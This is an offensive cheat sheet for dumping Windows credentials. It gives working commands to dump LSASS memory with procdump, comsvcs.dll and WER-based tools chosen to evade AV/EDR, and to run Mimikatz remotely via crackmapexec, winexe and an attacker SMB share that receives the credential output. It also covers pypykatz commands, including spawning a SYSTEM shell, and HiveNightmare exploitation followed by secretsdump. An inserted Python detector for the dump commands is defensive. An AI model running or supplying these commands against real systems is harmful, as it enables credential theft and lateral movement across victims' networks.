LSASS, Mimikatz, SAM

LSASS

# Avoiding running Mimikatz on the target is a nice option for stealth
# You can just dump the LSASS process, retrieve the dump and parse it locally
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Several dumping methods here
- https://kaluche.github.io/posts/2020/09/dumping-credentials-offline/
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md

# You can use the comsvcs.dll DLL in order to dump LSASS (https://beta.hackndo.com/remote-lsass-dump-passwords/)
# The DLL lives in C:\Windows\System32
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full

# Dumping LSASS using the Windows Error Reporting process
https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before-part-2

# Tool using SilentProcessExit
https://github.com/deepinstinct/LsassSilentProcessExit

# The idea is to use the legitimate WER functionality to dump LSASS without crashing it
# and to evade AV/EDR detection
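Added detection example, not part of the original notes: a small Python checker that flags the procdump and comsvcs.dll MiniDump command lines above, plus any process not on an allow-list opening lsass.exe with PROCESS_VM_READ, run over constructed Sysmon-style events (event IDs 1 and 10; the allow-list, sample paths and PID are assumptions).

```python
import re

# Constructed Sysmon-style sample events (not real telemetry):
# EventID 1 = process creation, EventID 10 = process access to another process.
SAMPLE_EVENTS = [
    {"EventID": 1, "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"EventID": 1, "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 624 lsass.dmp full"},
    {"EventID": 1, "CommandLine": "notepad.exe notes.txt"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\tool.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1fffff"},
]

# Command-line patterns for the two dump techniques listed above.
CMDLINE_RULES = [
    ("procdump_lsass", re.compile(r"procdump.*\s-ma\s+lsass", re.I)),
    ("comsvcs_minidump", re.compile(r"rundll32.*comsvcs\.dll.*MiniDump", re.I)),
]

PROCESS_VM_READ = 0x0010  # access right needed to read LSASS memory
# Hypothetical allow-list of images that legitimately open lsass.exe (tune per environment).
KNOWN_LSASS_READERS = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}


def classify(event):
    """Return an alert name for a suspicious event, or None if it looks benign."""
    if event["EventID"] == 1:
        for name, rx in CMDLINE_RULES:
            if rx.search(event["CommandLine"]):
                return name
    elif event["EventID"] == 10 and event["TargetImage"].lower().endswith(r"\lsass.exe"):
        access = int(event["GrantedAccess"], 16)
        if access & PROCESS_VM_READ and event["SourceImage"].lower() not in KNOWN_LSASS_READERS:
            return "lsass_memory_read"
    return None


def scan(events):
    """Return (alert, event) pairs for every event that classify() flags."""
    return [(classify(e), e) for e in events if classify(e)]


if __name__ == "__main__":
    for alert, e in scan(SAMPLE_EVENTS):
        print(alert, e.get("CommandLine") or e.get("SourceImage"))
```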

Mimikatz

# If you have an LSASS dump, you can use the minidump module
mimikatz # sekurlsa::minidump lsass.DMP
mimikatz # sekurlsa::logonPasswords /full

# You can upload mimikatz to a remote machine with smbclient

# Or you can use crackmapexec
# Execution may fail but the binary will still be uploaded to C:\\Windows\\mimikatz.exe
crackmapexec IP -u user -p password -M mimikatz

# Then you can execute remotely through winexe
winexe -U admin%password //IP C:\\Windows\\mimikatz.exe

# Password dumping
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords /full
# In case Mimikatz gets detected on the target machine, you can try running it from a network share
sudo python smbserver.py SHARE /home/xxxxx/share_path/

sudo ./venv/bin/crackmapexec smb IP -u "xxx" -p "xxx" -X '\\share_ip\SHARE\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords /full" exit > \\share_ip\SHARE\mimiout_$env:computername.txt'

# In order to be stealthier, you can even do the same for procdump
sudo ./venv/bin/crackmapexec smb IP -u "xxx" -p "xxx" -X '\\share_ip\SHARE\procdump.exe "TODO"'

Pypykatz

https://github.com/skelsec/pypykatz

# Mimikatz implementation in pure Python. At least a part of it :)
# Useful in case Mimikatz is detected by the target AV
# Cross platform (only needs Python 3.6)

# Live commands need to be run on a live system
# The other commands work offline
# Get LSASS credentials (+ Kerberos tickets)
pypykatz live lsa
pypykatz live lsa -o <output_dir> -k <kerberos_dir>

# List users prone to SPNRoast and ASRepRoast
pypykatz live ldap spn
pypykatz live ldap asrep

# Print all tokens
pypykatz live token list

# Spawn a SYSTEM shell
pypykatz live process create

# Print registry credentials
pypykatz live registry

# List all users that have ever logged on to the target
pypykatz live users list

# Returns the current user in domain:username:SID format
pypykatz live users whoami

# Parse a minidump file
pypykatz lsa minidump <input_file>

# List domain users prone to SPNRoast or ASRepRoast
pypykatz ldap TEST/victim/pw:@10.10.10.2 spn
pypykatz ldap TEST/victim/pw:@10.10.10.2 asrep

# Decrypt a GPP (Group Policy Preferences) password
pypykatz gppass <base64_enc_password>

HiveNightmare - SeriousSAM (CVE-2021-36934)

# Blogpost about the vuln
# Explanations, detection, mitigation included
https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5

# PoC
https://github.com/GossiTheDog/HiveNightmare

# Recap: non-admin local users can read some registry hives (including SAM, SECURITY and SYSTEM) on affected hosts

# Impacted
# All Windows 10 releases of the last 3 years,
# i.e. all versions since 1809

# Usage
.\HiveNightmare.exe [max shadow to look at]

# Then, get creds
python3 secretsdump.py -sam SAM-haxx -system SYSTEM-haxx -security SECURITY-haxx LOCAL

Dumping SAM in 2022

https://twitter.com/mpgn_x64/status/1545506443696246785
# Tools like chntpw, bkhive, pwdump and samdump2 no longer work on the latest Windows 10

# cd Windows/System32/config
# pypykatz registry --sam SAM SYSTEM